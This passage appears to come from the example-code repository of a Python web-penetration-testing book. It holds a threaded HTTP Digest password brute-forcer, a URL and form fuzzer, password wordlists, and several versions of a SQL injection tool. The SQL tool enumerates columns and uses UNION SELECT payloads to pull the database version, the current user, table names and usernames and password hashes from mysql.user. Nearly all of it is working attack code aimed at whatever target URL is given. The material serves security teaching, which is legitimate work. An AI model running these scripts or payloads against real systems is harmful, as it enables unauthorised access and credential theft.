15 | print "***************************************"
16 |
17 |
18 | def usage():
19 | print "Usage:"
20 | print " -w: url (http://somesite.com/admin)"
21 | print " -u: username"
22 | print " -t: threads"
23 | print " -f: dictionary file\n"
24 | print "example: brute-digest.py -w http://www.somesite.com/admin -u admin -t 5 -f pass.txt\n"
25 |
26 |
class request_performer(Thread):
    # One worker per candidate password: tries HTTP Digest auth and dumps
    # the protected content when a login succeeds.
    def __init__(self, name, user, url):
        Thread.__init__(self)
        self.password = name.split("\n")[0]  # strip trailing newline from dictionary line
        self.username = user
        self.url = url

    def run(self):
        global hit
        if hit == "1":  # another thread may have already found the password
            try:
                r = requests.get(self.url, auth=HTTPDigestAuth(self.username, self.password))
                if r.status_code == 200:
                    hit = "0"
                    print "Password found - " + self.password + " - !!!"
                    print "CONTENT************************************************"
                    print r.text
                    print "*******************************************************"
                    # NOTE(review): sys.exit() inside a worker only raises
                    # SystemExit in this thread; the success path also skips
                    # the i[0] decrement -- the launcher relies on `hit`.
                    sys.exit()
                else:
                    print "Not valid " + self.password
                    i[0] = i[0] - 1 # Here we remove one thread from the counter
            except Exception, e:
                print e
51 |
52 |
53 | def start(argv):
54 | banner()
55 | if len(sys.argv) < 5:
56 | usage()
57 | sys.exit()
58 | try:
59 | opts, args = getopt.getopt(argv, "u:w:f:t:")
60 | except getopt.GetoptError:
61 | print "Error en arguments"
62 | sys.exit()
63 |
64 | for opt, arg in opts:
65 | if opt == '-u':
66 | user = arg
67 | elif opt == '-w':
68 | url = arg
69 | elif opt == '-f':
70 | dict = arg
71 | elif opt == '-t':
72 | threads = arg
73 | try:
74 | f = open(dict, "r")
75 | name = f.readlines()
76 | except:
77 | print"Failed opening file: " + dict + "\n"
78 | sys.exit()
79 | launcher_thread(name, threads, user, url)
80 |
81 |
82 | def launcher_thread(names, th, username, url):
83 | global i
84 | i = []
85 | resultlist = []
86 | i.append(0)
87 | while len(names):
88 | try:
89 | if i[0] < th:
90 | n = names.pop(0)
91 | i[0] = i[0] + 1
92 | thread = request_performer(n, username, url)
93 | thread.start()
94 |
95 | except KeyboardInterrupt:
96 | print "Brute forcer interrupted by user. Finishing attack.."
97 | sys.exit()
98 | thread.join()
99 | return
100 |
101 |
# Script entry point: run the attack and turn Ctrl-C into a clean message.
if __name__ == "__main__":
    try:
        start(sys.argv[1:])
    except KeyboardInterrupt:
        print "Brute force interrupted by user, killing all threads..!!"
107 |
--------------------------------------------------------------------------------
/Examples/Chapter05/Section-5/common.txt:
--------------------------------------------------------------------------------
1 | admin
2 | admin12
3 | asdmin123
4 | asdasd
5 | qwerty
6 | administrat
7 | admin123
8 | administrator123
9 | admi
10 | adm
11 | adm123
12 | 123456
13 | admin
14 | pass
15 | password
16 | mypass
17 | secret
18 | treasure
19 | pass123
20 | pass1234
21 | pass12345
22 | pass123456
23 | admin1
24 | admin2
25 | admin12
26 | admin123
27 | admin1234
28 | admin12345
29 | 654321
30 | qwerty
31 |
--------------------------------------------------------------------------------
/Examples/Chapter05/Section-5/forzaBruta-forms.py:
--------------------------------------------------------------------------------
1 | import requests
2 | from threading import Thread
3 | import sys
4 | import time
5 | import getopt
6 | import re
7 | from termcolor import colored
8 |
9 | from selenium import webdriver
10 | from selenium.webdriver.common.keys import Keys
11 | from selenium.webdriver.common.desired_capabilities import DesiredCapabilities
12 |
13 |
14 | def banner():
15 | print "\n***************************************"
16 | print "* ForzaBruta Forms 0.5*"
17 | print "***************************************"
18 |
19 |
20 | def usage():
21 | print "Usage:"
22 | print " -w: url (http://somesite.com/FUZZ)"
23 | print " -t: threads"
24 | print " -f: dictionary file\n"
25 | print "example: forzabruta.py -w http://www.targetsite.com/FUZZ -t 5 -f common.txt\n"
26 |
27 |
class request_performer(Thread):
    # Worker thread: fuzzes one wordlist entry against the target, either as
    # a GET (no payload) or as a POST with FUZZ substituted in the payload.
    def __init__(self, word, url, hidecode, payload):
        Thread.__init__(self)
        # One raw wordlist line; drop the trailing newline.
        self.word = word.split("\n")[0]
        self.url = url.replace('FUZZ', self.word)
        if payload != "":
            # POST template like "user=FUZZ&pass=x" with FUZZ substituted.
            self.payload = payload.replace('FUZZ', self.word)
        else:
            self.payload=payload
        # Response size (chars, as a string) to suppress from the output.
        self.hidecode = hidecode

    def run(self):
        try:
            start = time.time()
            if self.payload == "":
                r = requests.get(self.url)
                elaptime = time.time()
                # NOTE(review): the [1:10] slice drops the first character of
                # the elapsed-time string -- presumably assuming a sub-10s
                # "0.xxx" value; confirm this is intentional.
                totaltime = str(elaptime - start)[1:10]
            else:
                # Turn "k1=v1&k2=v2" into {"k1": "v1", "k2": "v2"}.
                # (Shadows the builtins 'list' and 'dict'.)
                list=self.payload.replace("="," ").replace("&"," ").split(" ")
                payload = dict([(k, v) for k,v in zip (list[::2], list[1::2])])
                r = requests.post(self.url, data = payload)
                elaptime = time.time()
                totaltime = str(elaptime - start)[1:10]

            # Response statistics, all stringified for printing.
            lines = str(r.content.count("\n"))
            chars = str(len(r._content))
            words = str(len(re.findall("\S+", r.content)))
            code = str(r.status_code)
            # On redirects report the first status code in the chain.
            if r.history != []:
                first = r.history[0]
                code = str(first.status_code)
            else:
                pass

            # Skip responses whose size matches the -c filter.
            # NOTE(review): string comparison of status codes below works for
            # three-digit codes only; the default hidecode is the int 0, which
            # never equals a string, so nothing is hidden by default.
            if self.hidecode != chars:
                if '200' <= code < '300':
                    print totaltime + "\t" + colored(code,'green') + " \t\t" + chars + " \t\t" + words + " \t\t " + lines +"\t" + r.headers["server"] + "\t" + self.word
                elif '400' <= code < '500':
                    print totaltime + "\t" + colored(code,'red') + " \t\t" + chars + " \t\t" + words + " \t\t " + lines + "\t" + r.headers["server"] + "\t" + self.word
                elif '300' <= code < '400':
                    print totaltime + "\t" + colored(code,'blue') + " \t\t" + chars + " \t\t" + words + " \t\t " + lines + "\t"+ r.headers["server"] + "\t" + self.word
                else:
                    pass
            i[0] = i[0] - 1 # Here we remove one thread from the counter
        except Exception, e:
            # Broad catch (missing "server" header, network errors) keeps one
            # bad response from killing the run.
            print e
75 |
76 |
77 | def start(argv):
78 | banner()
79 | if len(sys.argv) < 5:
80 | usage()
81 | sys.exit()
82 | try:
83 | opts, args = getopt.getopt(argv, "w:f:t:p:c:")
84 | except getopt.GetoptError:
85 | print "Error en arguments"
86 | sys.exit()
87 | hidecode = 000
88 | payload = ""
89 | for opt, arg in opts:
90 | if opt == '-w':
91 | url = arg
92 | elif opt == '-f':
93 | dict = arg
94 | elif opt == '-t':
95 | threads = arg
96 | elif opt == '-p':
97 | payload = arg
98 | elif opt == '-c':
99 | hidecode = arg
100 | try:
101 | f = open(dict, "r")
102 | words = f.readlines()
103 | except:
104 | print"Failed opening file: " + dict + "\n"
105 | sys.exit()
106 | launcher_thread(words, threads, url, hidecode, payload)
107 |
108 |
109 | def launcher_thread(names, th, url, hidecode,payload):
110 | global i
111 | i = []
112 | resultlist = []
113 | i.append(0)
114 | print "-----------------------------------------------------------------------------------------------------------------------------------"
115 | print "Time" + "\t" + "\t code \t\tchars\t\twords\t\tlines"
116 | print "-----------------------------------------------------------------------------------------------------------------------------------"
117 | while len(names):
118 | try:
119 | if i[0] < th:
120 | n = names.pop(0)
121 | i[0] = i[0] + 1
122 | thread = request_performer(n, url, hidecode, payload)
123 | thread.start()
124 |
125 | except KeyboardInterrupt:
126 | print "ForzaBruta interrupted by user. Finishing attack.."
127 | sys.exit()
128 | thread.join()
129 | return
130 |
131 |
if __name__ == "__main__":
    # Entry point: strip the program name and hand the CLI args to start().
    try:
        start(sys.argv[1:])
    except KeyboardInterrupt:
        # Last-resort Ctrl+C handler for interrupts outside the worker loop.
        print "ForzaBruta interrupted by user, killing all threads..!!"
137 |
--------------------------------------------------------------------------------
/Examples/Chapter05/Section-5/pass.txt:
--------------------------------------------------------------------------------
1 | admin
2 | asdmini=
3 | userman
4 | manager
5 | powerful
6 | test
7 | administrator
8 | aaaadmin
9 | asdmini=
10 | userman
11 | manager
12 | powerful
13 | test
14 | dmin
15 | asdmini=
16 | userman
17 | manager
18 | admin123
19 | powerful
20 | test
21 | dmin
22 | asdmini=
23 | userman
24 | manager
25 | powerful
26 | test
27 | dmin
28 | asdmini=
29 | userman
30 | manager
31 | powerful
32 | test
33 | aaaaaaaadministrator
34 | aaaadmin
35 | asdmini=
36 | userman
37 | manager
38 | powerful
39 | test
40 | dmin
41 | asdmini=
42 | userman
43 | manager
44 | powerful
45 | administrator123
46 | test
47 | dmin
48 | asdmini=
49 | userman
50 | manager
51 | powerful
52 | test
53 | dmin
54 | asdmini=aaaadministrator
55 | aaaadmin
56 | asdmini=
57 | userman
58 | manager
59 | powerful
60 | test
61 | dmin
62 | asdmini=
63 | userman
64 | manager
65 | powerful
66 | test
67 | dmin
68 | asdmini=
69 | userman
70 | manager
71 | powerful
72 | test
73 | dmin
74 | asdmini=
75 | userman
76 | manager
77 | powerful
78 | test
79 | dministrator
80 | aaaadmin
81 | asdmini=
82 | userman
83 | manager
84 | powerful
85 | test
86 | dmin
87 | asdmini=
88 | userman
89 | manager
90 | powerful
91 | test
92 | dmin
93 | asdmini=
94 | userman
95 | manager
96 | powerful
97 | test
98 | dmin
99 | asdmini=
100 | userman
101 | manager
102 | powerful
103 | test
104 | dministrator
105 | aaaadmin
106 | asdmini=
107 | userman
108 | manager
109 | powerful
110 | test
111 | dmin
112 | asdmini=
113 | userman
114 | manager
115 | powerful
116 | test
117 | dmin
118 | asdmini=
119 | userman
120 | manager
121 | powerful
122 | test
123 | dmin
124 | asdmini=
125 | userman
126 | manager
127 | powerful
128 | test
129 | dministrator
130 | aaaadmin
131 | asdmini=
132 | userman
133 | manager
134 | powerful
135 | test
136 | dmin
137 | asdmini=
138 | userman
139 | manager
140 | powerful
141 | test
142 | dmin
143 | asdmini=
144 | userman
145 | manager
146 | powerful
147 | test
148 | dmin
149 | asdmini=
150 | userman
151 | manager
152 | powerful
153 | test
154 |
155 | userman
156 | manager
157 | powerful
158 | test
159 | dministrator
160 | aaaadmin
161 | asdmini=
162 | userman
163 | manager
164 | powerful
165 | test
166 | dmin
167 | asdmini=
168 | userman
169 | manager
170 | powerful
171 | test
172 | dmin
173 | asdmini=
174 | userman
175 | manager
176 | powerful
177 | test
178 | dmin
179 | asdmini=
180 | userman
181 | manager
182 | powerful
183 | test
184 | dministrator
185 | aaaadmin
186 | asdmini=
187 | userman
188 | manager
189 | powerful
190 | test
191 | dmin
192 | asdmini=
193 | userman
194 | manager
195 | powerful
196 | test
197 | dmin
198 | asdmini=
199 | userman
200 | manager
201 | powerful
202 | test
203 | dmin
204 | asdmini=
205 | userman
206 | manager
207 | powerful
208 | test
209 | dministrator
210 | aaaadmin
211 | asdmini=
212 | userman
213 | manager
214 | powerful
215 | test
216 | dmin
217 | asdmini=
218 | userman
219 | manager
220 | powerful
221 | test
222 | dmin
223 | asdmini=
224 | userman
225 | manager
226 | powerful
227 | test
228 | dmin
229 | asdmini=
230 | userman
231 | manager
232 | powerful
233 | test
234 | dministrator
235 | aaaadmin
236 | asdmini=
237 | userman
238 | manager
239 | powerful
240 | test
241 | dmin
242 | asdmini=
243 | userman
244 | manager
245 | powerful
246 | test
247 | dmin
248 | asdmini=
249 | userman
250 | manager
251 | powerful
252 | test
253 | dmin
254 | asdmini=
255 | userman
256 | manager
257 | powerful
258 | test
259 | dministrator
260 | aaaadmin
261 | asdmini=
262 | userman
263 | manager
264 | powerful
265 | test
266 | dmin
267 | asdmini=
268 | userman
269 | manager
270 | powerful
271 | test
272 | dmin
273 | asdmini=
274 | userman
275 | manager
276 | powerful
277 | test
278 | dmin
279 | asdmini=
280 | userman
281 | manager
282 | powerful
283 | test
284 | dministrator
285 | aaaadmin
286 | asdmini=
287 | userman
288 | manager
289 | powerful
290 | test
291 | dmin
292 | asdmini=
293 | userman
294 | manager
295 | powerful
296 | test
297 | dmin
298 | asdmini=
299 | userman
300 | manager
301 | powerful
302 | test
303 | dmin
304 | asdmini=
305 | userman
306 | manager
307 | powerful
308 | test
309 | dministrator
310 | aaaadmin
311 | asdmini=
312 | userman
313 | manager
314 | powerful
315 | test
316 | dmin
317 | asdmini=
318 | userman
319 | manager
320 | powerful
321 | test
322 | dmin
323 | asdmini=
324 | userman
325 | manager
326 | powerful
327 | test
328 | dmin
329 | asdmini=
330 | userman
331 | manager
332 | powerful
333 | test
334 | aaaaaaaaaaaaaadministrator
335 | aaaadmin
336 | asdmini=
337 | userman
338 | manager
339 | powerful
340 | test
341 | dmin
342 | asdmini=
343 | userman
344 | manager
345 | powerful
346 | test
347 | dmin
348 | asdmini=
349 | userman
350 | manager
351 | powerful
352 | test
353 | dmin
354 | asdmini=
355 | userman
356 | manager
357 | powerful
358 | test
359 | dministrator
360 | aaaadmin
361 | asdmini=
362 | userman
363 | manager
364 | powerful
365 | test
366 | dmin
367 | asdmini=
368 | userman
369 | manager
370 | powerful
371 | test
372 | dmin
373 | asdmini=
374 | userman
375 | manager
376 | powerful
377 | test
378 | dmin
379 | asdmini=
380 | userman
381 | manager
382 | powerful
383 | test
384 | dministrator
385 | aaaadmin
386 | asdmini=
387 | userman
388 | manager
389 | powerful
390 | test
391 | dmin
392 | asdmini=
393 | userman
394 | manager
395 | powerful
396 | test
397 | dmin
398 | asdmini=
399 | userman
400 | manager
401 | powerful
402 | test
403 | dmin
404 | asdmini=
405 | userman
406 | manager
407 | powerful
408 | test
409 | dministrator
410 | aaaadmin
411 | asdmini=
412 | userman
413 | manager
414 | powerful
415 | test
416 | dmin
417 | asdmini=
418 | userman
419 | manager
420 | powerful
421 | test
422 | dmin
423 | asdmini=
424 | userman
425 | manager
426 | powerful
427 | test
428 | dmin
429 | asdmini=
430 | userman
431 | manager
432 | powerful
433 | test
434 | dministrator
435 | aaaadmin
436 | asdmini=
437 | userman
438 | manager
439 | powerful
440 | test
441 | dmin
442 | asdmini=
443 | userman
444 | manager
445 | powerful
446 | test
447 | dmin
448 | asdmini=
449 | userman
450 | manager
451 | powerful
452 | test
453 | dmin
454 | asdmini=
455 | userman
456 | manager
457 | powerful
458 | test
459 | dministrator
460 | aaaadmin
461 | asdmini=
462 | userman
463 | manager
464 | powerful
465 | test
466 | dmin
467 | asdmini=
468 | userman
469 | manager
470 | powerful
471 | test
472 | dmin
473 | asdmini=
474 | userman
475 | manager
476 | powerful
477 | test
478 | dmin
479 | asdmini=
480 | userman
481 | manager
482 | powerful
483 | test
484 | dministrator
485 | aaaadmin
486 | asdmini=
487 | userman
488 | manager
489 | powerful
490 | test
491 | dmin
492 | asdmini=
493 | userman
494 | manager
495 | powerful
496 | test
497 | dmin
498 | asdmini=
499 | userman
500 | manager
501 | powerful
502 | test
503 | dmin
504 | asdmini=
505 | userman
506 | manager
507 | powerful
508 | test
509 | dministrator
510 | aaaadmin
511 | asdmini=
512 | userman
513 | manager
514 | powerful
515 | test
516 | dmin
517 | asdmini=
518 | userman
519 | manager
520 | powerful
521 | test
522 | dmin
523 | asdmini=
524 | userman
525 | manager
526 | powerful
527 | test
528 | dmin
529 | asdmini=
530 | userman
531 | manager
532 | powerful
533 | test
534 | dministrator
535 | aaaadmin
536 | asdmini=
537 | userman
538 | manager
539 | powerful
540 | test
541 | dmin
542 | asdmini=
543 | userman
544 | manager
545 | powerful
546 | test
547 | dmin
548 | asdmini=
549 | userman
550 | manager
551 | powerful
552 | test
553 | dmin
554 | asdmini=
555 | userman
556 | manager
557 | powerful
558 | test
559 | dministrator
560 | aaaadmin
561 | asdmini=
562 | userman
563 | manager
564 | powerful
565 | test
566 | dmin
567 | asdmini=
568 | userman
569 | manager
570 | powerful
571 | test
572 | dmin
573 | asdmini=
574 | userman
575 | manager
576 | powerful
577 | test
578 | dmin
579 | asdmini=
580 | userman
581 | manager
582 | powerful
583 | test
584 | dministrator
585 | aaaadmin
586 | asdmini=
587 | userman
588 | manager
589 | powerful
590 | test
591 | dmin
592 | asdmini=
593 | userman
594 | manager
595 | powerful
596 | test
597 | dmin
598 | asdmini=
599 | userman
600 | manager
601 | powerful
602 | test
603 | dmin
604 | asdmini=
605 | userman
606 | manager
607 | powerful
608 | test
609 | dministrator
610 | aaaadmin
611 | asdmini=
612 | userman
613 | manager
614 | powerful
615 | test
616 | dmin
617 | asdmini=
618 | userman
619 | manager
620 | powerful
621 | test
622 | dmin
623 | asdmini=
624 | userman
625 | manager
626 | powerful
627 | test
628 | dmin
629 | asdmini=
630 | userman
631 | manager
632 | powerful
633 | test
634 | dministrator
635 | aaaadmin
636 | asdmini=
637 | userman
638 | manager
639 | powerful
640 | test
641 | dmin
642 | asdmini=
643 | userman
644 | manager
645 | powerful
646 | test
647 | dmin
648 | asdmini=
649 | userman
650 | manager
651 | powerful
652 | test
653 | dmin
654 | asdmini=
655 | userman
656 | manager
657 | powerful
658 | test
659 | dministrator
660 | aaaadmin
661 | asdmini=
662 | userman
663 | manager
664 | powerful
665 | test
666 | dmin
667 | asdmini=
668 | userman
669 | manager
670 | powerful
671 | test
672 | dmin
673 | asdmini=
674 | userman
675 | manager
676 | powerful
677 | test
678 | dmin
679 | asdmini=
680 | userman
681 | manager
682 | powerful
683 | test
684 |
685 |
--------------------------------------------------------------------------------
/Examples/Chapter05/Section-5/passw.txt:
--------------------------------------------------------------------------------
1 | 123456
2 | 1234567
3 | 12345678
4 | 123asdf
5 | Admin
6 | admin
7 | administrator
8 | asdf123
9 | backup
10 | backupexec
11 | changeme
12 | clustadm
13 | cluster
14 | compaq
15 | default
16 | dell
17 | dmz
18 | domino
19 | exchadm
20 | exchange
21 | ftp
22 | gateway
23 | guest
24 | lotus
25 | manager
26 | money
27 | notes
28 | office
29 | oracle
30 | pass
31 | password
32 | password!
33 | password1
34 | print
35 | qwerty
36 | replicate
37 | seagate
38 | secret
39 | sql
40 | sqlexec
41 | temp
42 | temp!
43 | temp123
44 | test
45 | test!
46 | test123
47 | tivoli
48 | veritas
49 | virus
50 | web
51 | www
52 | KKKKKKK
53 |
--------------------------------------------------------------------------------
/Examples/Chapter06/Section-6/SQLinjector-0.py:
--------------------------------------------------------------------------------
1 | import requests
2 | import sys
3 | import getopt
4 | import re
5 | from termcolor import colored
6 |
7 |
8 | def banner():
9 | print "\n***************************************"
10 | print "* SQlinjector 1.0 *"
11 | print "***************************************"
12 |
13 | def usage():
14 | print "Usage:"
15 | print " -w: url (http://somesite.com/news.php?id=FUZZ)\n"
16 | print " -i: injection strings file \n"
17 | print "example: SQLinjector.py -w http://www.somesite.com/news.php?id=FUZZ \n"
18 |
19 |
20 | def start(argv):
21 | banner()
22 | if len(sys.argv) < 2:
23 | usage()
24 | sys.exit()
25 | try:
26 | opts, args = getopt.getopt(argv,"w:i:")
27 | except getopt.GetoptError:
28 | print "Error en arguments"
29 | sys.exit()
30 | for opt,arg in opts :
31 | if opt == '-w' :
32 | url=arg
33 | elif opt == '-i':
34 | dictio = arg
35 | try:
36 | print "[-] Opening injections file: " + dictio
37 | f = open(dictio, "r")
38 | name = f.read().splitlines()
39 | except:
40 | print"Failed opening file: "+ dictio+"\n"
41 | sys.exit()
42 | launcher(url,name)
43 |
44 | def launcher (url,dictio):
45 | injected = []
46 | for sqlinjection in dictio:
47 | injected.append(url.replace("FUZZ",sqlinjection))
48 | res = injector(injected)
49 | print "\n[+] Detection results:"
50 | print "------------------"
51 | for x in res:
52 | print x.split(";")[0]
53 |
54 |
55 | def injector(injected):
56 | errors = ['Mysql','error in your SQL']
57 | results = []
58 | for y in injected:
59 | print "[-] Testing errors: " + y
60 | req=requests.get(y)
61 | for x in errors:
62 | if req.content.find(x) != -1:
63 | res = y + ";" + x
64 | results.append(res)
65 | return results
66 |
if __name__ == "__main__":
    # Entry point: strip the program name and hand the CLI args to start().
    try:
        start(sys.argv[1:])
    except KeyboardInterrupt:
        # Last-resort Ctrl+C handler.
        print "SQLinjector interrupted by user..!!"
72 |
--------------------------------------------------------------------------------
/Examples/Chapter06/Section-6/SQLinjector-1.py:
--------------------------------------------------------------------------------
1 | import requests
2 | import sys
3 | import getopt
4 | import re
5 | from termcolor import colored
6 |
7 |
8 | def banner():
9 | print "\n***************************************"
10 | print "* SQlinjector 1.0 *"
11 | print "***************************************"
12 |
13 | def usage():
14 | print "Usage:"
15 | print " -w: url (http://somesite.com/news.php?id=FUZZ)\n"
16 | print " -i: injection strings file \n"
17 | print "example: SQLinjector.py -w http://www.somesite.com/news.php?id=FUZZ \n"
18 |
19 |
20 | def start(argv):
21 | banner()
22 | if len(sys.argv) < 2:
23 | usage()
24 | sys.exit()
25 | try:
26 | opts, args = getopt.getopt(argv,"w:i:")
27 | except getopt.GetoptError:
28 | print "Error en arguments"
29 | sys.exit()
30 | for opt,arg in opts :
31 | if opt == '-w' :
32 | url=arg
33 | elif opt == '-i':
34 | dictio = arg
35 | try:
36 | print "[-] Opening injections file: " + dictio
37 | f = open(dictio, "r")
38 | name = f.read().splitlines()
39 | except:
40 | print"Failed opening file: "+ dictio+"\n"
41 | sys.exit()
42 | launcher(url,name)
43 |
def launcher (url,dictio):
    # Orchestrates the scan: error-based detection first, then column
    # count and column-name enumeration. Output order matters here.
    injected = []
    for sqlinjection in dictio:
        injected.append(url.replace("FUZZ",sqlinjection))
    res = injector(injected)
    print "\n[+] Detection results:"
    print "------------------"
    for x in res:
        # Each entry is "url;signature" -- show only the URL part.
        print x.split(";")[0]

    print "\n[+] Detect columns: "
    print "-----------------"
    res = detect_columns(url)
    print "Number of columns: " + res
    # 'res' is reused: now a list of valid column names.
    res = detect_columns_names(url)

    print "\n[+] Columns names found: "
    print "-------------------------"
    for col in res:
        print col
64 |
65 | def injector(injected):
66 | errors = ['Mysql','error in your SQL']
67 | results = []
68 | for y in injected:
69 | print "[-] Testing errors: " + y
70 | req=requests.get(y)
71 | for x in errors:
72 | if req.content.find(x) != -1:
73 | res = y + ";" + x
74 | results.append(res)
75 | return results
76 |
def detect_columns(url):
    """Probe ORDER BY 1..19 and return the detected column count as a string.

    Stops at the first response containing "Unknown" (column out of range)."""
    probe = url.replace("FUZZ", "admin' order by X-- -")
    count = 1
    while count < 20:
        page = requests.get(probe.replace("X", str(count))).content
        if page.find("Unknown") != -1:
            break
        count += 1
    return str(count - 1)
87 |
def detect_columns_names(url):
    """Try common column names via GROUP BY probing; return those accepted
    (i.e. whose response does not contain "Unknown")."""
    candidates = ['username','user','name','pass','passwd','password','id','role','surname','address']
    probe = url.replace("FUZZ", "admin' group by X-- -")
    return [col for col in candidates
            if requests.get(probe.replace("X", col)).content.find("Unknown") == -1]
99 |
if __name__ == "__main__":
    # Entry point: strip the program name and hand the CLI args to start().
    try:
        start(sys.argv[1:])
    except KeyboardInterrupt:
        # Last-resort Ctrl+C handler.
        print "SQLinjector interrupted by user..!!"
105 |
--------------------------------------------------------------------------------
/Examples/Chapter06/Section-6/SQLinjector-2.py:
--------------------------------------------------------------------------------
1 | import requests
2 | import sys
3 | import getopt
4 | import re
5 | from termcolor import colored
6 |
7 |
8 | def banner():
9 | print "\n***************************************"
10 | print "* SQlinjector 1.0 *"
11 | print "***************************************"
12 |
13 | def usage():
14 | print "Usage:"
15 | print " -w: url (http://somesite.com/news.php?id=FUZZ)\n"
16 | print " -i: injection strings file \n"
17 | print "example: SQLinjector.py -w http://www.somesite.com/news.php?id=FUZZ \n"
18 |
19 |
20 | def start(argv):
21 | banner()
22 | if len(sys.argv) < 2:
23 | usage()
24 | sys.exit()
25 | try:
26 | opts, args = getopt.getopt(argv,"w:i:")
27 | except getopt.GetoptError:
28 | print "Error en arguments"
29 | sys.exit()
30 | for opt,arg in opts :
31 | if opt == '-w' :
32 | url=arg
33 | elif opt == '-i':
34 | dictio = arg
35 | try:
36 | print "[-] Opening injections file: " + dictio
37 | f = open(dictio, "r")
38 | name = f.read().splitlines()
39 | except:
40 | print"Failed opening file: "+ dictio+"\n"
41 | sys.exit()
42 | launcher(url,name)
43 |
def launcher (url,dictio):
    # Orchestrates the whole scan in order: error-based detection, column
    # enumeration, DB fingerprinting, then credential extraction.
    injected = []

    for x in dictio:
        sqlinjection=x
        injected.append(url.replace("FUZZ",sqlinjection))
    res = injector(injected)

    print colored('[+] Detection results:','green')
    print "------------------"
    for x in res:
        # Each entry is "url;signature" -- show only the URL part.
        print x.split(";")[0]

    print colored ('[+] Detect columns: ','green')
    print "-----------------"
    res = detect_columns(url)
    print "Number of columns: " + res
    # 'res' is reused: now a list of valid column names.
    res = detect_columns_names(url)

    print "[+] Columns names found: "
    print "-------------------------"
    for col in res:
        print col

    print colored('[+] DB version: ','green')
    print "---------------"
    detect_version(url)

    print colored('[+] Current USER: ','green')
    print "---------------"
    detect_user(url)

    print colored('[+] Attempting MYSQL user extraction','green')
    print "-------------------------------------"
    steal_users(url)

    # Terminate the script once the scan is complete.
    sys.exit()
81 |
82 |
83 | def injector(injected):
84 | errors = ['Mysql','error in your SQL']
85 | results = []
86 | for y in injected:
87 | print "[-] Testing errors: " + y
88 | req=requests.get(y)
89 | for x in errors:
90 | if req.content.find(x) != -1:
91 | res = y + ";" + x
92 | results.append(res)
93 | return results
94 |
def detect_columns(url):
    """Probe ORDER BY 1..19 and return the detected column count as a string.

    Stops at the first response containing "Unknown" (column out of range)."""
    probe = url.replace("FUZZ", "admin' order by X-- -")
    count = 1
    while count < 20:
        page = requests.get(probe.replace("X", str(count))).content
        if page.find("Unknown") != -1:
            break
        count += 1
    return str(count - 1)
105 |
106 | def steal_users(url):
107 | new_url= url.replace("FUZZ","""1\'%20union%20SELECT%20CONCAT
108 | ('TOK',user,'TOK'),CONCAT('TOK',password,'TOK')%20FROM
109 | %20mysql.user--%20-""")
110 | req=requests.get(new_url)
111 | reg = ur"TOK([\*a-zA-Z0-9].+?)TOK+?"
112 | users=re.findall(reg,req.content)
113 | for user in users:
114 | print user
115 |
116 | def detect_user(url):
117 | new_url= url.replace("FUZZ","""\'%20union%20SELECT%201,CONCAT('TOK',user(),
118 | 'TOK')--%20-""")
119 | req=requests.get(new_url)
120 | raw = req.content
121 | reg = ur"TOK([a-zA-Z0-9].+?)TOK+?"
122 | users=re.findall(reg,req.content)
123 | for user in users:
124 | print user
125 | return user
126 |
127 | def detect_version(url):
128 | new_url= url.replace("FUZZ","\'%20union%20SELECT%201,CONCAT('TOK',@@version,'TOK')--%20-")
129 | req=requests.get(new_url)
130 | raw = req.content
131 | reg = ur"TOK([a-zA-Z0-9].+?)TOK+?"
132 | version=re.findall(reg,req.content)
133 | for ver in version:
134 | print ver
135 | return ver
136 |
137 |
138 |
def detect_columns_names(url):
    """Try common column names via GROUP BY probing; return those accepted
    (i.e. whose response does not contain "Unknown")."""
    candidates = ['username','user','name','pass','passwd','password','id','role','surname','address']
    probe = url.replace("FUZZ", "admin' group by X-- -")
    return [col for col in candidates
            if requests.get(probe.replace("X", col)).content.find("Unknown") == -1]
150 |
if __name__ == "__main__":
    # Entry point: strip the program name and hand the CLI args to start().
    try:
        start(sys.argv[1:])
    except KeyboardInterrupt:
        # Last-resort Ctrl+C handler.
        print "SQLinjector interrupted by user..!!"
156 |
--------------------------------------------------------------------------------
/Examples/Chapter06/Section-6/SQLinjector-3.py:
--------------------------------------------------------------------------------
1 | import requests
2 | import sys
3 | import getopt
4 | import re
5 | from termcolor import colored
6 |
7 |
8 | def banner():
9 | print "\n***************************************"
10 | print "* SQlinjector 1.0 *"
11 | print "***************************************"
12 |
13 | def usage():
14 | print "Usage:"
15 | print " -w: url (http://somesite.com/news.php?id=FUZZ)\n"
16 | print " -i: injection strings file \n"
17 | print "example: SQLinjector.py -w http://www.somesite.com/news.php?id=FUZZ \n"
18 |
19 |
20 | def start(argv):
21 | banner()
22 | if len(sys.argv) < 2:
23 | usage()
24 | sys.exit()
25 | try:
26 | opts, args = getopt.getopt(argv,"w:i:")
27 | except getopt.GetoptError:
28 | print "Error en arguments"
29 | sys.exit()
30 | for opt,arg in opts :
31 | if opt == '-w' :
32 | url=arg
33 | elif opt == '-i':
34 | dictio = arg
35 | try:
36 | print "[-] Opening injections file: " + dictio
37 | f = open(dictio, "r")
38 | name = f.read().splitlines()
39 | except:
40 | print"Failed opening file: "+ dictio+"\n"
41 | sys.exit()
42 | launcher(url,name)
43 |
def launcher (url,dictio):
    # Orchestrates the whole scan in order: error-based detection, column
    # enumeration, DB fingerprinting, then table-name discovery.
    injected = []

    for x in dictio:
        sqlinjection=x
        injected.append(url.replace("FUZZ",sqlinjection))
    res = injector(injected)

    print colored('[+] Detection results:','green')
    print "------------------"
    for x in res:
        # Each entry is "url;signature" -- show only the URL part.
        print x.split(";")[0]

    print colored ('[+] Detect columns: ','green')
    print "-----------------"
    res = detect_columns(url)
    print "Number of columns: " + res
    # 'res' is reused: now a list of valid column names.
    res = detect_columns_names(url)

    print "[+] Columns names found: "
    print "-------------------------"
    for col in res:
        print col

    print colored('[+] DB version: ','green')
    print "---------------"
    detect_version(url)

    print colored('[+] Current USER: ','green')
    print "---------------"
    detect_user(url)

    print colored('[+] Get tables names:','green')
    print "---------------------"
    detect_table_names(url)
79 |
80 |
81 | def injector(injected):
82 | errors = ['Mysql','error in your SQL']
83 | results = []
84 | for y in injected:
85 | print "[-] Testing errors: " + y
86 | req=requests.get(y)
87 | for x in errors:
88 | if req.content.find(x) != -1:
89 | res = y + ";" + x
90 | results.append(res)
91 | return results
92 |
def detect_columns(url):
    """Probe ORDER BY 1..19 and return the detected column count as a string.

    Stops at the first response containing "Unknown" (column out of range)."""
    probe = url.replace("FUZZ", "admin' order by X-- -")
    count = 1
    while count < 20:
        page = requests.get(probe.replace("X", str(count))).content
        if page.find("Unknown") != -1:
            break
        count += 1
    return str(count - 1)
103 |
104 | def detect_version(url):
105 | new_url= url.replace("FUZZ","\'%20union%20SELECT%201,CONCAT('TOK',@@version,'TOK')--%20-")
